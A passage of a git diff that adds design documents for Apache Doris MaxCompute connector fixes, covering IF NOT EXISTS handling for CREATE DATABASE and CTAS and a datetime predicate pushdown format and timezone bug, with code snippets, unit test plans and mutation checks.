`verify(metadata).databaseExists(...)`、`verify(metadata,never()).createDatabase(...)`、`verify(mockEditLog,never()).logCreateDb(...)`、`resetMetaCacheNamesCount==0`。WHY:DG-4 回归——远端已存在+IFNE 须 FE 侧 no-op。 +2. `testCreateDbIfNotExistsCreatesWhenRemoteAbsent`:`supportsCreateDatabase=true`、`databaseExists=false` → `verify(metadata).createDatabase(...)`、`logCreateDb` 写、`resetMetaCacheNamesCount==1`。WHY:远端不存在仍建库(证明没退化成永不建)。 +3. `testCreateDbIfNotExistsBypassesPrecheckWhenConnectorLacksCreateSupport`:`supportsCreateDatabase=false`(默认)、ifNotExists=true、dbNullableResult=null → `verify(metadata).createDatabase(...)`(落 createDatabase)、`verify(metadata,never()).databaseExists(...)`(&& 短路不查远端)。WHY:守 jdbc/es/trino 字节不变——能力门闸防止预检对不支持建库的连接器静默 no-op。 +**MUTATION**:(a) 删整条预检行 → 测 1&2 红(databaseExists 未被调 + createDatabase/logCreateDb 被调);(b) 去掉 `metadata.supportsCreateDatabase() &&` → 测 3 红(gate 去掉后 databaseExists 被查 → `never().databaseExists` 断言违反;createDatabase 仍被调,因测 3 的 databaseExists 默认 false——gate 的职责是跳过远端探测,非阻止建库)。(实测:mutA→测1&2 红、测3 绿;mutB→测3 红;mutC 连接器 true→false→CapabilityTest 红。) + +## Test Plan + +### Unit Tests + +**文件**:`fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java` +**类**:`PluginDrivenExternalCatalogDdlRoutingTest`(既有,新增 2 测试到 CREATE DATABASE 区块 `:95` 后) + +1. `testCreateDbIfNotExistsSkipsWhenRemoteDbExists` + - **Arrange**:`catalog.dbNullableResult = null`(FE-cache miss);`Mockito.when(metadata.databaseExists(session, "db1")).thenReturn(true)`;`ifNotExists=true`。 + - **Act**:`catalog.createDb("db1", true, new HashMap<>())`。 + - **Assert**: + - `verify(metadata).databaseExists(session, "db1")`(远端预检确被执行); + - `verify(metadata, never()).createDatabase(any(), any(), any())`(不建库); + - `verify(mockEditLog, never()).logCreateDb(any())`(不写 editlog); + - `assertEquals(0, catalog.resetMetaCacheNamesCount)`(不刷 cache)。 + - **WHY(Rule 9)**:legacy `createDbImpl:113-117` 对"远端已存在 + IF NOT EXISTS"干净 no-op(返回 true → 上层跳 logCreateDb/afterCreateDb);cutover 丢了远端这一半,会让请求穿透到 ODPS `schemas().create()` 抛 "already exists"。本测试锁定"远端存在即 FE 侧 no-op",守住 DG-4 回归——`IF NOT EXISTS` 对远端已存在库不得报错、不得产生 editlog/cache 副作用。 + +2. `testCreateDbIfNotExistsCreatesWhenRemoteDbAbsent` + - **Arrange**:`catalog.dbNullableResult = null`(FE-cache miss);`metadata.databaseExists` 默认(Mockito boolean 默认 `false`,等价远端不存在);`ifNotExists=true`。 + - **Act**:`catalog.createDb("db1", true, props)`。 + - **Assert**: + - `verify(metadata).databaseExists(session, "db1")`(预检执行且返回 false); + - `verify(metadata).createDatabase(session, "db1", props)`(确实建库); + - `verify(mockEditLog).logCreateDb(any())`(写 editlog); + - `assertEquals(1, catalog.resetMetaCacheNamesCount)`(刷 cache)。 + - **WHY(Rule 9)**:守住"远端不存在时仍正常建库 + 写 editlog + 刷 cache"——证明 fix 没有把所有 IF-NOT-EXISTS 都误判成已存在、退化成永不建库。与测试 1 构成"存在↔不存在"对照,编码 legacy `:114` 分支的两侧语义。 + + **MUTATION 检查**:把生产代码新增的远端预检整行 + `if (ifNotExists && connector.getMetadata(session).databaseExists(session, dbName)) { ... return; }` + 删除(即一行 revert 回 cutover 现状)后: + - 测试 1(`testCreateDbIfNotExistsSkipsWhenRemoteDbExists`)**变红**——`createDatabase`/`logCreateDb`/`resetMetaCacheNames` 会被调用,`never()` 断言失败。 + - 测试 2 仍绿(remote==false 时本就该建库)。 + 即测试 1 是该 fix 的"杀手测试",精确钉住被删除的那行业务逻辑。 + + 补充:现有 `testCreateDbIfNotExistsShortCircuitsWhenDbExists`(FE-cache 命中)继续守"快路径不查远端"——若 mutation 误把快路径 `getDbNullable` 短路也删了,它会红。 + +### E2E Tests + +- **CI 注记**:UT-only,CI 跳 live ODPS(与本批所有 MC fix 同)。 +- 真值闸(手动 / live ODPS):在远端 ODPS 预建 schema `db_x`,确保本 FE `getDbNullable("db_x")==null`(新 FE 或未刷 cache),执行 `CREATE DATABASE IF NOT EXISTS .db_x`: + - 修前:报 ODPS "already exists" 失败; + - 修后:静默成功(no-op),且未产生重复建库 / editlog。 +- 若 `regression-test/suites/` 下有 MaxCompute DDL 套件(依赖 live ODPS 环境变量、CI 默认 skip),可加一条 IF-NOT-EXISTS-on-existing-remote-db 断言;否则保持 UT 覆盖 + 手动 e2e。 + +### 构建 / 守门(informational,不在本设计执行) +- `mvn -f /fe/pom.xml -pl :fe-core -am test -Dtest=PluginDrivenExternalCatalogDdlRoutingTest -Dmaven.build.cache.enabled=false`(fe-core 改动)。 +- `mvn -f /fe/pom.xml -pl :fe-core checkstyle:check`(CustomImportOrder/UnusedImports/LineLength 120;扫 test 源)。 +- import-gate 不涉(无连接器改动):`bash tools/check-connector-imports.sh` 仍应过。 +- 无 SPI(fe-connector-api)改动 → 无需 api+maxcompute+fe-core 全量重建。 diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-design.md new file mode 100644 index 00000000000000..4d9181fe99ebc4 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-design.md @@ -0,0 +1,383 @@ +# Problem + +After the MaxCompute SPI cutover, a `max_compute` catalog is a `PluginDrivenExternalCatalog`. +Its `createTable(CreateTableInfo)` override **unconditionally returns `false`** and +**unconditionally writes the create-table edit log** — even when the statement carried +`IF NOT EXISTS` and the target table already exists (the connector silently no-op'd it). + +The return value is load-bearing for CTAS: + +- `CreateTableCommand.run` (CTAS branch) at `CreateTableCommand.java:103`: + `if (Env.getCurrentEnv().createTable(this.createTableInfo)) { return; }` +- `Env.createTable` (`Env.java:3749-3752`) returns `catalogIf.createTable(info)` directly — + the override's return value flows straight up. + +So `CREATE TABLE IF NOT EXISTS t AS SELECT ...` against an **already-existing** `t` returns +`false`, the CTAS does **not** short-circuit, and the command proceeds to build and run an +`INSERT INTO` the pre-existing table. This is a **silent data change** (DG-6 / F33), not the +benign edit-log redundancy it was previously triaged as (old DDL-C5, minor). The redundant +edit log is a secondary defect (one extra `OP_CREATE_TABLE` per IF-NOT-EXISTS hit). + +The `Env.createTable` contract is explicit (`Env.java` Javadoc, just above `:3749`): +> `@return if CreateTableStmt.isIfNotExists is true, return true if table already exists otherwise return false` + +The override violates this contract. + +# Root Cause + +`PluginDrivenExternalCatalog.createTable` overrides the base path and does its **own** edit +log — it never calls `super`/`ExternalCatalog.createTable`. So the fix lives entirely in this +override. + +Confirmed cutover evidence — `PluginDrivenExternalCatalog.java:263-300`: + +``` +263 @Override +264 public boolean createTable(CreateTableInfo createTableInfo) throws UserException { +265 makeSureInitialized(); +272 ExternalDatabase db = getDbNullable(createTableInfo.getDbName()); +273 if (db == null) { throw new DdlException("Failed to get database: ..."); } +277 ConnectorSession session = buildConnectorSession(); +278 ConnectorCreateTableRequest request = CreateTableInfoToConnectorRequestConverter +279 .convert(createTableInfo, db.getRemoteName()); +280 try { +281 connector.getMetadata(session).createTable(session, request); // no-ops on existing+ifNotExists +282 } catch (DorisConnectorException e) { throw new DdlException(e.getMessage(), e); } +285 ... persistInfo = new org.apache.doris.persist.CreateTableInfo(getName(), dbName, tableName); +290 Env.getCurrentEnv().getEditLog().logCreateTable(persistInfo); // ALWAYS written +296 getDbForReplay(...).ifPresent(d -> d.resetMetaCacheNames()); // ALWAYS reset +299 return false; // ALWAYS false <-- BUG +300 } +``` + +The connector confirms the no-op semantics — `MaxComputeConnectorMetadata.createTable` +(`MaxComputeConnectorMetadata.java:331-345`): + +``` +337 if (structureHelper.tableExist(odps, dbName, tableName)) { +338 if (request.isIfNotExists()) { +339 LOG.info("create table[{}.{}] which already exists", dbName, tableName); +340 return; // <-- existing + IF NOT EXISTS: silent no-op +341 } +343 throw new DorisConnectorException("Table '" + tableName + "' already exists ..."); +344 } // <-- existing + NOT ifNotExists: already errors +``` + +So today: existing-table + `IF NOT EXISTS` → connector returns normally → override falls +through to `logCreateTable` + `resetMetaCacheNames` + `return false`. The `false` is the +regression; the edit log + cache reset are wasted work in that case. + +`isIfNotExists` is correctly plumbed end-to-end (so the override can read it): +`CreateTableInfo.isIfNotExists()` exists (`CreateTableInfo.java:356`) and the converter +forwards it (`CreateTableInfoToConnectorRequestConverter.java:70` `.ifNotExists(info.isIfNotExists())`). + +# Parity Reference + +Legacy `MaxComputeMetadataOps.createTableImpl` — `MaxComputeMetadataOps.java:166-249` +(the exact branch being mirrored, `:178-197`): + +``` +166 public boolean createTableImpl(CreateTableInfo createTableInfo) throws UserException { +172 ExternalDatabase db = dorisCatalog.getDbNullable(dbName); +173 if (db == null) { throw new UserException("Failed to get database: ..."); } +178 // 2. Check if table exists in remote +179 if (tableExist(db.getRemoteName(), tableName)) { +180 if (createTableInfo.isIfNotExists()) { +181 LOG.info("create table[{}] which already exists", tableName); +182 return true; // <-- returns TRUE, before any SDK create +183 } else { +184 ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, tableName); +185 } +186 } +188 // 3. Check if table exists in local (case sensitivity issue) +189 ExternalTable dorisTable = db.getTableNullable(tableName); +190 if (dorisTable != null) { +191 if (createTableInfo.isIfNotExists()) { +192 LOG.info("create table[{}] which already exists", tableName); +193 return true; // <-- returns TRUE +194 } else { +195 ErrorReport.reportDdlException(ErrorCode.ERR_TABLE_EXISTS_ERROR, tableName); +196 } +197 } + ... // 4-8: validate + build schema + SDK create +248 return false; // <-- new table: returns FALSE +249 } +``` + +And the editlog gate — base `ExternalCatalog.createTable` (`ExternalCatalog.java:1055-1080`), +which the **legacy** metadataOps path runs through: + +``` +1063 boolean res = metadataOps.createTable(createTableInfo); +1064 if (!res) { // <-- editlog ONLY when a NEW table was created +1071 Env.getCurrentEnv().getEditLog().logCreateTable(info); +1074 } +1075 return res; +``` + +Net legacy semantics to mirror: +1. existing + `IF NOT EXISTS` → `return true`, **no** SDK create, **no** editlog, (legacy also + never invokes `afterCreateTable`/cache reset because the `!res` branch is skipped). +2. existing + **not** `IF NOT EXISTS` → `ERR_TABLE_EXISTS_ERROR` (a `DdlException`). +3. new → SDK create, `return false`, editlog written, cache reset. + +# Design + +Chosen direction (per the issue, honored): **NO SPI change.** Fix lives entirely inside the +`PluginDrivenExternalCatalog.createTable` override by adding the existence pre-check that +mirrors legacy `createTableImpl:178-197`, and branching the return value / side effects on it. + +Existence check — mirror legacy's **two** probes: +- **Remote**: `connector.getMetadata(session).getTableHandle(session, db.getRemoteName(), tableName).isPresent()`. + This is the legacy `tableExist(db.getRemoteName(), tableName)` analog. We reuse the existing + SPI `getTableHandle` (`ConnectorTableOps.java:36`, default `Optional.empty()`) rather than + adding a method — it is already overridden by MaxCompute (`MaxComputeConnectorMetadata.java:111`, + backed by `structureHelper.tableExist`) and is the **same** method `dropTable` already uses in + this class, so the pattern is in-house. The table name is passed **raw** (not remote-resolved), + exactly as legacy `:179` and as the existing override's documented convention + (`:270`: "table name is intentionally NOT remote-resolved"). +- **Local**: `db.getTableNullable(tableName) != null` (legacy `:189`, the case-sensitivity guard). + +Why `getTableHandle` and not a new `tableExists` SPI: MaxCompute *does* expose a public +`tableExists(session, dbName, tableName)` on its impl (`MaxComputeConnectorMetadata.java:105`), +but that method is **not** on the `ConnectorMetadata`/`ConnectorTableOps` SPI surface (no api-module +declaration — grep-confirmed), so it is not callable from fe-core through the connector interface +without an additive SPI change. `getTableHandle` *is* on the SPI with a safe `Optional.empty()` +default, so it is the zero-SPI-change, zero-other-connector-break path and matches Rule 2/Rule 3. + +Branching: +- `exists && createTableInfo.isIfNotExists()` → `return true`; **skip** the connector + `createTable` call (it would only no-op), **skip** `logCreateTable`, **skip** + `resetMetaCacheNames`. (Mirrors legacy branch 1 + the `!res` editlog gate.) +- `exists && !isIfNotExists()` → **delegate the error to the connector** (do not add an FE-side + throw). Rationale below. +- else (new) → unchanged: connector `createTable`, `logCreateTable`, `resetMetaCacheNames`, + `return false`. + +**Decision — non-`IF NOT EXISTS` existing-table error path (Rule 7 / Rule 2):** +Legacy raises `ERR_TABLE_EXISTS_ERROR` FE-side at `:184/:195`. The cutover connector already +raises on this case (`MaxComputeConnectorMetadata.java:343`, +`"Table '...' already exists in database '...'"`), which the override wraps to `DdlException` +at `:282-283`. To keep the change **minimal and surgical** and avoid a second source of truth +for "already exists", we do **not** add an FE-side `ErrorReport.reportDdlException` for the +existing-table check. Instead: +- We only short-circuit (skip the connector call) for the `IF NOT EXISTS` hit. +- For `exists && !isIfNotExists()` we let control fall through to the existing + `connector.createTable(...)` call, which throws → `DdlException` (today's behavior, unchanged). + +This means the FE-side existence probe is used **only** to decide the `IF NOT EXISTS` +short-circuit; the not-`IF NOT EXISTS` error stays exactly as it is today. Trade-off surfaced: +the legacy error code (`ERR_TABLE_EXISTS_ERROR`, MySQL 1050) differs from the connector's +generic `DdlException` message. That message divergence already exists on the cutover branch +today and is **out of scope** for this data-change fix; restoring the exact error code would +add FE-side error machinery for no behavioral parity benefit beyond the message text. Flagged +for cleanup, not fixed here. (If the orchestrator wants exact-message parity, see Open +Question.) + +Also update the stale Javadoc at `:256-261` that claims the override "conservatively assumes +creation happened and writes the edit log" — that statement is now false for the IF-NOT-EXISTS +existing-table path. + +# Implementation Plan + +All production changes in **one** file. One test file changed. No signature changes anywhere. + +### 1. `fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java` + +**(a) Replace the stale Javadoc paragraph at `:257-261`** (the "void SPI / conservatively +assumes creation happened" paragraph) with one that documents the new IF-NOT-EXISTS parity: + +> The SPI `createTable` is `void` and the override has no `metadataOps`; this method therefore +> mirrors legacy `MaxComputeMetadataOps.createTableImpl`: when the table already exists and +> `IF NOT EXISTS` was given it returns `true` and skips the connector create + edit log + cache +> reset (so CTAS short-circuits instead of INSERTing into the existing table); otherwise it +> creates the table, writes the edit log, resets the cache, and returns `false`. + +**(b) Insert the existence pre-check** after the session is built (after `:277`) and before the +converter/connector call. Method signature unchanged +(`public boolean createTable(CreateTableInfo createTableInfo) throws UserException`): + +```java +ConnectorSession session = buildConnectorSession(); +ConnectorMetadata metadata = connector.getMetadata(session); + +// Mirror legacy MaxComputeMetadataOps.createTableImpl:178-197 -- probe both the remote +// (connector) and the local FE cache for an existing table. On IF NOT EXISTS this lets CTAS +// short-circuit (Env.createTable contract: return true when the table already exists), so a +// "CREATE TABLE IF NOT EXISTS ... AS SELECT" does NOT fall through to an INSERT into the +// pre-existing table. The table name is intentionally NOT remote-resolved (legacy parity). +boolean exists = metadata.getTableHandle(session, db.getRemoteName(), + createTableInfo.getTableName()).isPresent() + || db.getTableNullable(createTableInfo.getTableName()) != null; +if (exists && createTableInfo.isIfNotExists()) { + LOG.info("create table[{}.{}.{}] which already exists; skipping (IF NOT EXISTS)", + getName(), createTableInfo.getDbName(), createTableInfo.getTableName()); + return true; +} + +ConnectorCreateTableRequest request = CreateTableInfoToConnectorRequestConverter + .convert(createTableInfo, db.getRemoteName()); +try { + metadata.createTable(session, request); // existing + !ifNotExists throws here -> DdlException (unchanged) +} catch (DorisConnectorException e) { + throw new DdlException(e.getMessage(), e); +} +``` + +Reuse the `metadata` local for both the existence probe and the create call (replaces the +inline `connector.getMetadata(session)` at the old `:281`) — one `getMetadata` call, consistent +with how `dropTable` in this class already holds a `metadata` reference. + +The new-table tail (`persistInfo` build, `logCreateTable`, `resetMetaCacheNames`, the existing +`LOG.info`, `return false`) is **unchanged**. + +**Imports:** `ConnectorMetadata` (`org.apache.doris.connector.api.ConnectorMetadata`) — confirm +it is already imported (the class already uses `connector.getMetadata(...)`); if the local-var +type triggers an import, add it in CustomImportOrder position. No other new imports +(`getTableHandle`/`isIfNotExists`/`getTableNullable` are all on already-imported types). + +### 2. `fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java` + +Add tests in the `// ==================== CREATE TABLE ====================` section (see Test +Plan). No changes to the `TestablePluginCatalog` harness are required — it already exposes +`getDbNullable`/`getDbForReplay`/`resetMetaCacheNames` and mocks `metadata`. The only addition +is stubbing `db.getTableNullable(...)` and `metadata.getTableHandle(...)` per-test. + +No call-site changes anywhere (no signature change). + +# Blast Radius + +**Other connectors (es/jdbc/hive/hudi/iceberg/paimon/trino): ZERO break — proven.** +- No SPI signature change (Rule: additive-or-none). The fix calls only `getTableHandle`, which + is an *existing* `ConnectorTableOps` default returning `Optional.empty()` + (`ConnectorTableOps.java:36-40`). +- This override (`PluginDrivenExternalCatalog.createTable`) is reached **only** by + plugin-driven catalogs. jdbc/es/trino external catalogs route create-table through + `ExternalCatalog.createTable` → `metadataOps.createTable` (their `metadataOps` is non-null); + they never enter this override. (The test file's class Javadoc confirms: plugin catalogs have + `metadataOps == null`.) +- For a hypothetical future full-adopter connector that does **not** override `getTableHandle`, + `exists` collapses to `db.getTableNullable(...) != null` (FE-cache only). That is strictly + *more* conservative than legacy MaxCompute (it just may miss a remote-only table that the FE + cache hasn't seen), and never regresses the new-table path. No connector is broken. + +**Callers of the changed method:** +- `Env.createTable` (`Env.java:3749-3752`) → `catalogIf.createTable(info)`: now receives `true` + on the IF-NOT-EXISTS existing-table case. This is exactly the contract `Env.createTable`'s + own Javadoc promises — the caller `CreateTableCommand.java:103` `if (createTable(...)) return;` + now short-circuits as intended. No code change at the call site; behavior is the fix. +- Plain (non-CTAS) `CREATE TABLE IF NOT EXISTS` on an existing table: `CreateTableCommand.run` + non-CTAS branch (`:91`) calls `Env.createTable` and ignores the return — behavior is now + "no editlog, no SDK call" instead of "redundant editlog"; strictly an improvement, no visible + user effect. + +**Existing tests whose assertions must change: NONE (they are preserved, not changed).** +- `testCreateTablePassesRemoteDbNameToConverter` (`:315-341`): stubs neither `getTableNullable` + nor `getTableHandle`. With the harness, `db` is a Mockito mock → `getTableNullable` returns + `null`, and `metadata.getTableHandle(...)` returns `Optional.empty()` (Mockito default) → + `exists == false` → the new-table path runs unchanged → `convert(info, "DB1")` still invoked. + **Stays green.** +- `testCreateTableInvalidatesDbCacheUsingLocalNames` (`:353-389`): same — `exists == false` → + `metadata.createTable` called, editlog written with local names, `resetMetaCacheNames` on the + replay db. **Stays green.** (This is the regression guard for the new-table / common path.) +- `testCreateTableMissingDbThrows` (`:343-351`): `db == null` branch is untouched. **Stays green.** +- All `createDb`/`dropDb`/`dropTable` tests: untouched code paths. + +So we **add** assertions for the existing-table path; we **change** none. + +# Risk Analysis + +- **Extra remote round-trip on every CREATE TABLE.** `getTableHandle` for MaxCompute calls + `structureHelper.tableExist` *and* `getOdpsTable` (`MaxComputeConnectorMetadata.java:113-121`) + — one extra ODPS metadata fetch per create. Legacy `createTableImpl` did the same `tableExist` + probe (`:179`), so this is **parity, not a new cost** (legacy's `tableExist` was a remote + call too). The `getOdpsTable` inside `getTableHandle` is marginally heavier than a bare + existence check, but CREATE TABLE is rare and not latency-sensitive; acceptable. (Avoiding it + would require a `tableExists` SPI method — rejected per the No-SPI-change directive.) +- **Short-circuit skips the connector's own `IF NOT EXISTS` no-op.** We now never call + `connector.createTable` on the existing+ifNotExists path. The connector's branch + (`:337-341`) was *also* a pure no-op in that case, so no behavior is lost; we just decide it + FE-side (required to get the correct `return true`). +- **Local-vs-remote existence divergence.** If the FE cache is stale (table exists remotely but + not in cache), `getTableHandle` still catches it (remote probe). If it exists in cache but not + remotely (dropped out-of-band), `getTableNullable` catches it → we `return true` and skip + create. Legacy did the identical OR (`:179` remote OR `:189` local), so this is exact parity. +- **Error-message divergence on `exists && !IF NOT EXISTS`** (DdlException text vs legacy + `ERR_TABLE_EXISTS_ERROR`) — pre-existing on the cutover branch, explicitly out of scope, + flagged for cleanup. Fail-loud is preserved (it still throws). Rule 12 satisfied. +- **Mutation safety / no silent skip.** The new-table path is byte-for-byte the old behavior; + the only added branch is guarded by `exists && isIfNotExists()`. No path silently succeeds + that previously failed. + +# Test Plan + +## Unit Tests + +File: `fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java` +Class: `PluginDrivenExternalCatalogDdlRoutingTest` (add to the CREATE TABLE section). + +**Test 1 — `testCreateTableIfNotExistsExistingTableReturnsTrueAndSkipsAllSideEffects`** +- Arrange: `db = mockExternalDatabase()`, `db.getRemoteName()` → `"DB1"`, + `catalog.dbNullableResult = db`; `info.isIfNotExists()` → `true`, + `info.getDbName()` → `"db1"`, `info.getTableName()` → `"t1"`; stub + `metadata.getTableHandle(session, "DB1", "t1")` → `Optional.of(mock(ConnectorTableHandle.class))`. +- Act: `boolean res = catalog.createTable(info);` +- Assert: + - `assertTrue(res, ...)` — WHY: a `false` here makes `CreateTableCommand:103` not short-circuit, + so CTAS INSERTs into the already-existing table (silent data change, DG-6). This is the + core regression guard. + - `verify(metadata, never()).createTable(any(), any())` — WHY: the connector create must be + skipped on the IF-NOT-EXISTS hit (it would only no-op; calling it is wasted + masks intent). + - `verify(mockEditLog, never()).logCreateTable(any())` — WHY: legacy writes editlog only when a + NEW table was created (`ExternalCatalog.java:1064` `if (!res)`); a redundant `OP_CREATE_TABLE` + on an existing table pollutes the journal. + - `assertEquals(0, catalog.resetMetaCacheNamesCount)` *(or* `verify(replayDb, never()).resetMetaCacheNames()` + if a replay db is stubbed)* — WHY: no metadata changed, so no cache invalidation; legacy's + `afterCreateTable` runs only on the `!res` branch. + +**Test 2 — `testCreateTableIfNotExistsExistingLocalTableReturnsTrue`** (local-cache arm of the OR) +- Arrange: `db.getRemoteName()` → `"DB1"`; `metadata.getTableHandle(session, "DB1", "t1")` + → `Optional.empty()` (remote says absent); `db.getTableNullable("t1")` → `mock(ExternalTable.class)` + (FE cache has it); `info.isIfNotExists()` → `true`. +- Act/Assert: `assertTrue(res)`, `verify(metadata, never()).createTable(...)`, + `verify(mockEditLog, never()).logCreateTable(...)`. +- WHY: legacy checks BOTH remote (`:179`) and local (`:189`); this guards the local arm so a + refactor that drops the `getTableNullable` probe (keeping only `getTableHandle`) goes red — + it encodes the case-sensitivity / stale-remote parity, not just "exists". + +**Test 3 (new-table regression guard) — covered by EXISTING +`testCreateTableInvalidatesDbCacheUsingLocalNames` (`:353-389`).** It already asserts the +new-table path: `metadata.createTable` called, editlog written with local names, +`resetMetaCacheNames` on replay db. Its implicit return value is `false`. We rely on it as the +"new table still creates + logs" guard (no duplication, Rule 2). Optionally add one explicit +line to that test: `assertFalse(catalog.createTable(info))` capture — but since it already +locks the side effects, adding a 4th near-identical test is redundant. + +**MUTATION CHECK (Rule 9):** +- One-line production revert: change the new branch back to the original unconditional tail — + i.e. delete the `if (exists && createTableInfo.isIfNotExists()) { return true; }` block (so the + method always falls through to `logCreateTable` + `resetMetaCacheNames` + `return false`). + → **Test 1 goes red** on every assertion (`assertTrue(res)` first: gets `false`; + `verify(never()).logCreateTable` fails: editlog written; `resetMetaCacheNamesCount` becomes 1). + This is precisely the DG-6 production bug, so the test cannot pass while the bug is present. +- Second mutation: change `exists = getTableHandle(...).isPresent() || getTableNullable(...) != null` + to drop the `|| getTableNullable(...) != null` arm. → **Test 2 goes red** (remote stub is + empty, so `exists` becomes `false`, falls into the new-table path, `createTable` gets called). + Encodes the local-cache parity intent. + +## E2E Tests + +`regression-test/suites/...` — the truth-gate is a live ODPS run (CI-skipped, per the standing +e2e policy; no e2e is exercised in CI). Intent to verify when a live ODPS env is available: + +1. `CREATE TABLE IF NOT EXISTS mc_existing AS SELECT * FROM src;` against a pre-existing + `mc_existing` → asserts the table's row count / contents are **unchanged** (no INSERT + occurred) and the statement returns OK. This is the end-to-end form of the silent-data-change + regression. (Pre-fix: rows from `src` get appended.) +2. `CREATE TABLE IF NOT EXISTS mc_new AS SELECT * FROM src;` for a fresh `mc_new` → table is + created and populated (new-table path intact). + +These belong alongside the existing MaxCompute CTAS / DDL suites; CI will skip the live-ODPS +suite. Note (Rule 12): UT alone cannot prove the absence of the downstream INSERT against a real +table — UT proves `createTable` returns `true` and the CTAS command's `if (...) return;` +short-circuits; the live e2e is what confirms no rows were written. diff --git a/plan-doc/tasks/designs/P4-T06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md b/plan-doc/tasks/designs/P4-T06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md new file mode 100644 index 00000000000000..5713f7c01f6dc5 --- /dev/null +++ b/plan-doc/tasks/designs/P4-T06e-FIX-DATETIME-PUSHDOWN-FORMAT-design.md @@ -0,0 +1,180 @@ +# [P4-T06e] FIX-DATETIME-PUSHDOWN-FORMAT (GAP0/1) — design + +> 来源:Batch-D 红线扩充对抗复审 workflow `wbw4xszrg`。用户定 **Fix(Tier 1,major correctness/perf)**。 +> 关联:legacy 对照 `MaxComputeScanNode.convertLiteralToOdpsValues:529-613`;fe-core 字面量来源 `ExprToConnectorExpressionConverter.convertDateLiteral:309-321`。 + +## Problem + +翻闸后,对 max_compute 表的 **DATETIME / TIMESTAMP / TIMESTAMP_NTZ** 列下推谓词坏。当 catalog 开启 `datetime_predicate_push_down`(默认开,见 `MCConnectorProperties.DEFAULT_DATETIME_PREDICATE_PUSH_DOWN`)时: + +```sql +-- 例:dt 为 DATETIME 列,session time_zone = 'Asia/Shanghai'(非 UTC) +SELECT * FROM mc.db.t WHERE dt = '2023-02-02 00:00:00'; +``` + +两条独立 delta(互不掩盖,须同修): + +- **delta-1(format,perf + 可能错)**:谓词字面量被错误地序列化为 `LocalDateTime.toString()` 形态(`'T'` 分隔、变精度,如 `"2023-02-02T00:00"`),再喂给空格分隔、定长的 `DATETIME_3/6_FORMATTER` → + - **非 UTC session**:`LocalDateTime.parse` 抛 `DateTimeParseException` → 被顶层 `convert()` catch → **整棵 conjunct 树降为 `NO_PREDICATE`**(谓词永不下推 = 性能回归,全表扫 + BE 兜底过滤)。 + - **UTC session**:`convertDateTimezone` 短路返回未转换的 `"2023-02-02T00:00"` → 把 **malformed 字面量**推给 ODPS(`dt == "2023-02-02T00:00"`,结果未定:可能 ODPS 报错、可能匹配错/丢行)。 +- **delta-2(TZ source,丢行)**:source timezone 取 **project-region TZ**(由 endpoint URL 推),而 legacy 取 **session TZ**。当 session TZ ≠ project-region TZ 且 ≠ UTC 时,转换基准错位 → 推给 ODPS 的 UTC 字面量整体偏移 → **静默丢行 / 匹配错行**。仅 delta-1 修好后 delta-2 才会显形(否则谓词早已被丢)。 + +行正确性 + 性能双回归。仅 MaxCompute 暴露(唯一翻闸的 SPI 文件扫描连接器;`MaxComputePredicateConverter` 为 MC 专有类)。 + +## Root Cause(已核码确认) + +### delta-1:过早 stringify LocalDateTime + +| # | 位置 | 行为 | +|---|---|---| +| 1 | `ExprToConnectorExpressionConverter.convertDateLiteral:316-320` | DATE/DATEV2 → `LocalDate`;其余(DATETIME/DATETIMEV2/TIMESTAMP…)→ **`LocalDateTime`**(nanos = `microsecond*1000`,故始终微秒精度、末 3 nano 位恒 0)。存入 `ConnectorLiteral` 的 `Object value`。 | +| 2 | `MaxComputePredicateConverter.formatLiteralValue:201` | `String rawValue = String.valueOf(literal.getValue())` → 对 `LocalDateTime` 调 `toString()` = ISO-8601 `'T'` 分隔、**变精度**(省略尾零:`"2023-02-02T00:00"`、`"...T00:00:00.123"`)。 | +| 3 | `formatLiteralValue` DATETIME:227-232 / TIMESTAMP:234-239 | 把该 `rawValue` 喂 `convertDateTimezone(rawValue, DATETIME_3/6_FORMATTER, UTC)`。formatter = `"yyyy-MM-dd HH:mm:ss.SSS[SSS]"`(空格分隔、定长)。 | +| 4 | `convertDateTimezone:256-262` | 非 UTC → `LocalDateTime.parse(rawValue, formatter)` ↯ `'T'` vs 空格 + 缺秒/分数 → **抛**;UTC → 短路返回 raw(malformed)。 | +| 5 | `TIMESTAMP_NTZ:241-245` | 直接 `" \"" + rawValue + "\" "`(无 formatter、无 TZ)→ 推 `'T'` 分隔 malformed 字面量。 | + +**legacy 正确做法**(`MaxComputeScanNode:558-593`):`dateLiteral.getStringValue(ScalarType.createDatetimeV2Type(3|6))` → 直接产空格分隔、定长 fraction 的串(`"2023-02-02 00:00:00.000"`),与同名 formatter 完全对齐;从不经 `toString()`。 + +**字节级对齐已验**(delta-1 修法依据):`DateLiteral.getStringValue(Type)` :508-520 用 `scaledMicroseconds = microsecond / SCALE_FACTORS[scale]`(**截断**)+ 定长 `scale` 位 fraction + 空格分隔。`LocalDateTime.format(ofPattern("...ss.SSS"))` 的 `SSS` 同为**截断**取前 N 位 fraction;因 step-1 保证 nanos = micro×1000(末 3 nano 位恒 0),`SSS`→3 位、`SSSSSS`→6 位与 legacy `getStringValue(scale=3|6)` **逐字符相等**(micro=123456: 截断→`.123`/`.123456`;micro=0→`.000`/`.000000`)。故「直接 format LocalDateTime」= legacy `getStringValue` 输出,无精度分歧。 + +### delta-2:source TZ 用 project-region 而非 session + +| 位置 | cutover | legacy | +|---|---|---| +| source TZ | `MaxComputeScanPlanProvider.convertFilter:287` → `resolveProjectTimeZone()` → `MCConnectorEndpoint.resolveProjectTimeZone(endpoint)` :111-125(由 endpoint URL region 查 `REGION_ZONE_MAP`) | `MaxComputeScanNode.convertDateTimezone:603/609` → `DateUtils.getTimeZone()` :403-408 = `ZoneId.of(ConnectContext.get().getSessionVariable().getTimeZone())`(**session TZ**) | + +Doris 把 datetime 字面量按 **session time_zone** 解释;要正确推给 ODPS(其 